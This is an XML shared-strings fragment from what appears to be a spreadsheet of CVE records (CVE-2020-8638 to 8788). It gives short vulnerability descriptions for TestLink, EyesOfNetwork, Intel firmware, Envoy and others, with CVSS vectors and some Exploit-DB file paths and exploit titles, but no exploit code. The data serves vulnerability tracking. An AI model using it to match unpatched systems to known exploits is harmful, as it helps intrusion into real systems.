  <si>
    <t>A SQL injection vulnerability in TestLink 1.9.20 allows attackers to execute arbitrary SQL commands in dragdroptreenodes.php via the node_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8638</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in TestLink 1.9.20 allows attackers to execute arbitrary SQL commands in planUrgency.php via the urgency parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8639</t>
  </si>
  <si>
    <t>An unrestricted file upload vulnerability in keywordsImport.php in TestLink 1.9.20 allows remote attackers to execute arbitrary code by uploading a file with an executable extension. This allows an authenticated attacker to upload a malicious file (containing PHP code to execute operating system commands) to a publicly accessible directory of the application.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49561.py</t>
  </si>
  <si>
    <t>TestLink 1.9.20 - Unrestricted File Upload (Authenticated)</t>
  </si>
  <si>
    <t>2021-02-15</t>
  </si>
  <si>
    <t>CVE-2020-8641</t>
  </si>
  <si>
    <t>Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8644</t>
  </si>
  <si>
    <t>PlaySMS before 1.4.3 does not sanitize inputs from a malicious string.</t>
  </si>
  <si>
    <t>exploits/php/remote/48335.rb</t>
  </si>
  <si>
    <t>PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)</t>
  </si>
  <si>
    <t>CVE-2020-8645</t>
  </si>
  <si>
    <t>An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.</t>
  </si>
  <si>
    <t>CVE-2020-8647</t>
  </si>
  <si>
    <t>There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vc_do_resize function in drivers/tty/vt/vt.c.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-8648</t>
  </si>
  <si>
    <t>There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the n_tty_receive_buf_common function in drivers/tty/n_tty.c.</t>
  </si>
  <si>
    <t>CVE-2020-8649</t>
  </si>
  <si>
    <t>There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vgacon_invert_region function in drivers/video/console/vgacon.c.</t>
  </si>
  <si>
    <t>CVE-2020-8654</t>
  </si>
  <si>
    <t>An issue was discovered in EyesOfNetwork 5.3. An authenticated web user with sufficient privileges could abuse the AutoDiscovery module to run arbitrary OS commands via the /module/module_frame/index.php autodiscovery.php target field.</t>
  </si>
  <si>
    <t>CVE-2020-8655</t>
  </si>
  <si>
    <t>An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run arbitrary commands as root via a crafted NSE script for nmap 7.</t>
  </si>
  <si>
    <t>CVE-2020-8656</t>
  </si>
  <si>
    <t>An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48025.txt</t>
  </si>
  <si>
    <t>EyesOfNetwork 5.3 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-8657</t>
  </si>
  <si>
    <t>An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API key (hardcoded as EONAPI_KEY in include/api_functions.php for API version 2.4.2) by default for all installations, hence allowing an attacker to calculate/guess the admin access token.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/48169.rb</t>
  </si>
  <si>
    <t>EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)</t>
  </si>
  <si>
    <t>2020-03-05</t>
  </si>
  <si>
    <t>CVE-2020-8658</t>
  </si>
  <si>
    <t>The BestWebSoft Htaccess plugin through 1.8.1 for WordPress allows wp-admin/admin.php?page=htaccess.php&amp;action=htaccess_editor CSRF. The flag htccss_nonce_name passes the nonce to WordPress but the plugin does not validate it correctly, resulting in a wrong implementation of anti-CSRF protection. In this way, an attacker is able to direct the victim to a malicious web page that modifies the .htaccess file, and takes control of the website.</t>
  </si>
  <si>
    <t>CVE-2020-8659</t>
  </si>
  <si>
    <t>CNCF Envoy through 1.13.0 may consume excessive amounts of memory when proxying HTTP/1.1 requests or responses with many small (i.e. 1 byte) chunks.</t>
  </si>
  <si>
    <t>CVE-2020-8660</t>
  </si>
  <si>
    <t>CNCF Envoy through 1.13.0 TLS inspector bypass. TLS inspector could have been bypassed (not recognized as a TLS client) by a client using only TLS 1.3. Because TLS extensions (SNI, ALPN) were not inspected, those connections might have been matched to a wrong filter chain, possibly bypassing some security restrictions in the process.</t>
  </si>
  <si>
    <t>CVE-2020-8661</t>
  </si>
  <si>
    <t>CNCF Envoy through 1.13.0 may consume excessive amounts of memory when responding internally to pipelined requests.</t>
  </si>
  <si>
    <t>CVE-2020-8663</t>
  </si>
  <si>
    <t>Envoy version 1.14.2, 1.13.2, 1.12.4 or earlier may exhaust file descriptors and/or memory when accepting too many connections.</t>
  </si>
  <si>
    <t>CVE-2020-8664</t>
  </si>
  <si>
    <t>CNCF Envoy through 1.13.0 has incorrect Access Control when using SDS with Combined Validation Context. Using the same secret (e.g. trusted CA) across many resources together with the combined validation context could lead to the “static” part of the validation context to be not applied, even though it was visible in the active config dump.</t>
  </si>
  <si>
    <t>CVE-2020-8669</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable information disclosure via network access.</t>
  </si>
  <si>
    <t>CVE-2020-8670</t>
  </si>
  <si>
    <t>Race condition in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8671</t>
  </si>
  <si>
    <t>Insufficient control flow management in BIOS firmware 8th, 9th Generation Intel(R) Core(TM) Processors and Intel(R) Celeron(R) Processor 4000 Series may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8672</t>
  </si>
  <si>
    <t>Out of bound read in BIOS firmware for 8th, 9th Generation Intel(R) Core(TM), Intel(R) Celeron(R) Processor 4000 Series Processors may allow an unauthenticated user to potentially enable elevation of privilege or denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8674</t>
  </si>
  <si>
    <t>Out-of-bounds read in DHCPv6 subsystem in Intel(R) AMT and Intel(R)ISM versions before 11.8.77, 11.12.77, 11.22.77, 12.0.64 and 14.0.33 may allow an unauthenticated user to potentially enable information disclosure via network access.</t>
  </si>
  <si>
    <t>CVE-2020-8675</t>
  </si>
  <si>
    <t>Insufficient control flow management in firmware build and signing tool for Intel(R) Innovation Engine before version 1.0.859 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-8676</t>
  </si>
  <si>
    <t>Improper access control in the Intel(R) Visual Compute Accelerator 2, all versions, may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8677</t>
  </si>
  <si>
    <t>Improper access control in the Intel(R) Visual Compute Accelerator 2, all versions, may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8678</t>
  </si>
  <si>
    <t>Improper access control for Intel(R) Graphics Drivers before version 15.45.33.5164 and 27.20.100.8280 may allow an authenticated user to potentially enable an escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8679</t>
  </si>
  <si>
    <t>Out-of-bounds write in Kernel Mode Driver for some Intel(R) Graphics Drivers before version 26.20.100.7755 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8680</t>
  </si>
  <si>
    <t>Race condition in some Intel(R) Graphics Drivers before version 15.40.45.5126 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8681</t>
  </si>
  <si>
    <t>Out of bounds write in system driver for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8682</t>
  </si>
  <si>
    <t>Out of bounds read in system driver for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8683</t>
  </si>
  <si>
    <t>Improper buffer restrictions in system driver for some Intel(R) Graphics Drivers before version 15.33.50.5129 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8684</t>
  </si>
  <si>
    <t>Improper access control in firmware for Intel(R) PAC with Arria(R) 10 GX FPGA before Intel Acceleration Stack version 1.2.1 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8685</t>
  </si>
  <si>
    <t>Improper authentication in subsystem for Intel (R) LED Manager for NUC before version 1.2.3 may allow privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8687</t>
  </si>
  <si>
    <t>Uncontrolled search path in the installer for Intel(R) RSTe Software RAID Driver for the Intel(R) Server Board M10JNP2SB before version 4.7.0.1119 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8688</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) RAID Web Console 3 for Windows* may allow an unauthenticated user to potentially enable denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2020-8689</t>
  </si>
  <si>
    <t>Improper buffer restrictions in the Intel(R) Wireless for Open Source before version 1.5 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8690</t>
  </si>
  <si>
    <t>Protection mechanism failure in Intel(R) Ethernet 700 Series Controllers before version 7.3 may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8691</t>
  </si>
  <si>
    <t>A logic issue in the firmware of the Intel(R) Ethernet 700 Series Controllers may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8692</t>
  </si>
  <si>
    <t>Insufficient access control in the firmware of the Intel(R) Ethernet 700 Series Controllers before version 7.3 may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8693</t>
  </si>
  <si>
    <t>Improper buffer restrictions in the firmware of the Intel(R) Ethernet 700 Series Controllers may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8694</t>
  </si>
  <si>
    <t>Insufficient access control in the Linux kernel driver for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8695</t>
  </si>
  <si>
    <t>Observable discrepancy in the RAPL interface for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8696</t>
  </si>
  <si>
    <t>Improper removal of sensitive information before storage or transfer in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8698</t>
  </si>
  <si>
    <t>CVE-2020-8700</t>
  </si>
  <si>
    <t>Improper input validation in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8701</t>
  </si>
  <si>
    <t>Incorrect default permissions in installer for the Intel(R) SSD Toolbox versions before 2/9/2021 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8702</t>
  </si>
  <si>
    <t>Uncontrolled search path element in the Intel(R) Processor Diagnostic Tool before version 4.1.5.37 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8703</t>
  </si>
  <si>
    <t>Improper buffer restrictions in a subsystem in the Intel(R) CSME versions before 11.8.86, 11.12.86, 11.22.86, 12.0.81, 13.0.47, 13.30.17, 14.1.53, 14.5.32 and 15.0.22 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8704</t>
  </si>
  <si>
    <t>Race condition in a subsystem in the Intel(R) LMS versions before 2039.1.0.0 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8705</t>
  </si>
  <si>
    <t>Insecure default initialization of resource in Intel(R) Boot Guard in Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE versions before 3.1.80 and 4.0.30, Intel(R) SPS versions before E5_04.01.04.400, E3_04.01.04.200, SoC-X_04.00.04.200 and SoC-A_04.00.04.300 may allow an unauthenticated user to potentially enable escalation of privileges via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-8706</t>
  </si>
  <si>
    <t>Buffer overflow in a daemon for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8707</t>
  </si>
  <si>
    <t>Buffer overflow in daemon for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8708</t>
  </si>
  <si>
    <t>Improper authentication for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8709</t>
  </si>
  <si>
    <t>Improper authentication in socket services for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8710</t>
  </si>
  <si>
    <t>Buffer overflow in the bootloader for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8711</t>
  </si>
  <si>
    <t>Improper access control in the bootloader for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8712</t>
  </si>
  <si>
    <t>Buffer overflow in a verification process for some Intel(R) Server Boards, Server Systems and Compute Modules before version 2.45 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8713</t>
  </si>
  <si>
    <t>CVE-2020-8714</t>
  </si>
  <si>
    <t>Improper authentication for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8715</t>
  </si>
  <si>
    <t>Invalid pointer for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8716</t>
  </si>
  <si>
    <t>Improper access control for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8717</t>
  </si>
  <si>
    <t>Improper input validation in a subsystem for some Intel Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8718</t>
  </si>
  <si>
    <t>Buffer overflow in a subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8719</t>
  </si>
  <si>
    <t>Buffer overflow in subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8720</t>
  </si>
  <si>
    <t>Buffer overflow in a subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8721</t>
  </si>
  <si>
    <t>Improper input validation for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8722</t>
  </si>
  <si>
    <t>Buffer overflow in a subsystem for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8723</t>
  </si>
  <si>
    <t>Cross-site scripting for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-8729</t>
  </si>
  <si>
    <t>Buffer copy without checking size of input for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8730</t>
  </si>
  <si>
    <t>Heap-based overflow for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8731</t>
  </si>
  <si>
    <t>Incorrect execution-assigned permissions in the file system for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8732</t>
  </si>
  <si>
    <t>Heap-based buffer overflow in the firmware for some Intel(R) Server Boards, Server Systems and Compute Modules before version 1.59 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8733</t>
  </si>
  <si>
    <t>Improper buffer restrictions in the firmware for Intel(R) Server Board M10JNP2SB before version 7.210 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8734</t>
  </si>
  <si>
    <t>Improper input validation in the firmware for Intel(R) Server Board M10JNP2SB before version 7.210 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8736</t>
  </si>
  <si>
    <t>Improper access control in subsystem for the Intel(R) Computing Improvement Program before version 2.4.5718 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8737</t>
  </si>
  <si>
    <t>Improper buffer restrictions in the Intel(R) Stratix(R) 10 FPGA firmware provided with the Intel(R) Quartus(R) Prime Pro software before version 20.1 may allow an unauthenticated user to potentially enable escalation of privilege and/or information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-8738</t>
  </si>
  <si>
    <t>Improper conditions check in Intel BIOS platform sample code for some Intel(R) Processors before may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8739</t>
  </si>
  <si>
    <t>Use of potentially dangerous function in Intel BIOS platform sample code for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8740</t>
  </si>
  <si>
    <t>Out of bounds write in Intel BIOS platform sample code for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8741</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Thunderbolt(TM) non-DCH driver, all versions, for Windows may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8742</t>
  </si>
  <si>
    <t>Improper input validation in the firmware for Intel(R) NUCs may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8743</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) Mailbox Interface driver, all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8744</t>
  </si>
  <si>
    <t>Improper initialization in subsystem for Intel(R) CSME versions before12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE versions before 4.0.30 Intel(R) SPS versions before E3_05.01.04.200 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8745</t>
  </si>
  <si>
    <t>Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25 , Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-8746</t>
  </si>
  <si>
    <t>Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8747</t>
  </si>
  <si>
    <t>Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure and/or denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2020-8749</t>
  </si>
  <si>
    <t>Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8750</t>
  </si>
  <si>
    <t>Use after free in Kernel Mode Driver for Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8751</t>
  </si>
  <si>
    <t>Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, Intel(R) TXE versions before 3.1.80 may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-8752</t>
  </si>
  <si>
    <t>Out-of-bounds write in IPv6 subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow an unauthenticated user to potentially enable escalation of privileges via network access.</t>
  </si>
  <si>
    <t>CVE-2020-8753</t>
  </si>
  <si>
    <t>Out-of-bounds read in DHCP subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access.</t>
  </si>
  <si>
    <t>CVE-2020-8754</t>
  </si>
  <si>
    <t>Out-of-bounds read in subsystem for Intel(R) AMT, Intel(R) ISM versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow an unauthenticated user to potentially enable information disclosure via network access.</t>
  </si>
  <si>
    <t>CVE-2020-8755</t>
  </si>
  <si>
    <t>Race condition in subsystem for Intel(R) CSME versions before 12.0.70 and 14.0.45, Intel(R) SPS versions before E5_04.01.04.400 and E3_05.01.04.200 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-8756</t>
  </si>
  <si>
    <t>Improper input validation in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8757</t>
  </si>
  <si>
    <t>Out-of-bounds read in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70 and 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8758</t>
  </si>
  <si>
    <t>Improper buffer restrictions in network subsystem in provisioned Intel(R) AMT and Intel(R) ISM versions before 11.8.79, 11.12.79, 11.22.79, 12.0.68 and 14.0.39 may allow an unauthenticated user to potentially enable escalation of privilege via network access. On un-provisioned systems, an authenticated user may potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8759</t>
  </si>
  <si>
    <t>Improper access control in the installer for Intel(R) SSD DCT versions before 3.0.23 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8760</t>
  </si>
  <si>
    <t>Integer overflow in subsystem for Intel(R) AMT versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 14.0.45 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8761</t>
  </si>
  <si>
    <t>Inadequate encryption strength in subsystem for Intel(R) CSME versions before 13.0.40 and 13.30.10 may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2020-8763</t>
  </si>
  <si>
    <t>Improper permissions in the installer for the Intel(R) RealSense(TM) D400 Series UWP driver for Windows* 10 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8764</t>
  </si>
  <si>
    <t>Improper access control in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8765</t>
  </si>
  <si>
    <t>Incorrect default permissions in the installer for the Intel(R) RealSense(TM) DCM may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8766</t>
  </si>
  <si>
    <t>Improper conditions check in the Intel(R) SGX DCAP software before version 1.6 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2020-8767</t>
  </si>
  <si>
    <t>Uncaught exception in the Intel(R) 50GbE IP Core for Intel(R) Quartus Prime before version 20.2 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2020-8768</t>
  </si>
  <si>
    <t>An issue was discovered on Phoenix Contact Emalytics Controller ILC 2050 BI before 1.2.3 and BI-L before 1.2.3 devices. There is an insecure mechanism for read and write access to the configuration of the device. The mechanism can be discovered by examining a link on the website of the device.</t>
  </si>
  <si>
    <t>CVE-2020-8771</t>
  </si>
  <si>
    <t>The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.</t>
  </si>
  <si>
    <t>CVE-2020-8772</t>
  </si>
  <si>
    <t>The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing authorization check in iwp_mmb_set_request in init.php. Any attacker who knows the username of an administrator can log in.</t>
  </si>
  <si>
    <t>CVE-2020-8773</t>
  </si>
  <si>
    <t>The Richtext Editor in Pega Platform before 8.2.6 is affected by a Stored Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8774</t>
  </si>
  <si>
    <t>Pega Platform before version 8.2.6 is affected by a Reflected Cross-Site Scripting vulnerability in the "ActionStringID" function.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-8775</t>
  </si>
  <si>
    <t>Pega Platform before version 8.2.6 is affected by a Stored Cross-Site Scripting (XSS) vulnerability in the comment tags.</t>
  </si>
  <si>
    <t>CVE-2020-8776</t>
  </si>
  <si>
    <t>Alfresco Enterprise before 5.2.7 and Alfresco Community before 6.2.0 (rb65251d6-b368) has XSS via the URL property of a file.</t>
  </si>
  <si>
    <t>CVE-2020-8777</t>
  </si>
  <si>
    <t>Alfresco Enterprise before 5.2.7 and Alfresco Community before 6.2.0 (rb65251d6-b368) has XSS via a user profile photo, as demonstrated by a SCRIPT element in an SVG document.</t>
  </si>
  <si>
    <t>CVE-2020-8778</t>
  </si>
  <si>
    <t>Alfresco Enterprise before 5.2.7 and Alfresco Community before 6.2.0 (rb65251d6-b368) has XSS via an uploaded document, when the attacker has write access to a project.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48162.txt</t>
  </si>
  <si>
    <t>Alfresco 5.2.4 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-8781</t>
  </si>
  <si>
    <t>Lack of input sanitization in UpdateRebootMgr service of ALEOS 4.11 and later allow an escalation to root from a low-privilege process.</t>
  </si>
  <si>
    <t>CVE-2020-8782</t>
  </si>
  <si>
    <t>Unauthenticated RPC server on ALEOS before 4.4.9, 4.9.5, and 4.14.0 allows remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8783</t>
  </si>
  <si>
    <t>SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 1 of 4).</t>
  </si>
  <si>
    <t>CVE-2020-8784</t>
  </si>
  <si>
    <t>SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 2 of 4).</t>
  </si>
  <si>
    <t>CVE-2020-8785</t>
  </si>
  <si>
    <t>SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 3 of 4).</t>
  </si>
  <si>
    <t>CVE-2020-8786</t>
  </si>
  <si>
    <t>SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow SQL Injection (issue 4 of 4).</t>
  </si>
  <si>
    <t>CVE-2020-8787</t>
  </si>
  <si>
    <t>SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow for an invalid Bean ID to be submitted.</t>
  </si>
  <si>
    <t>CVE-2020-8788</t>
  </si>
  <si>
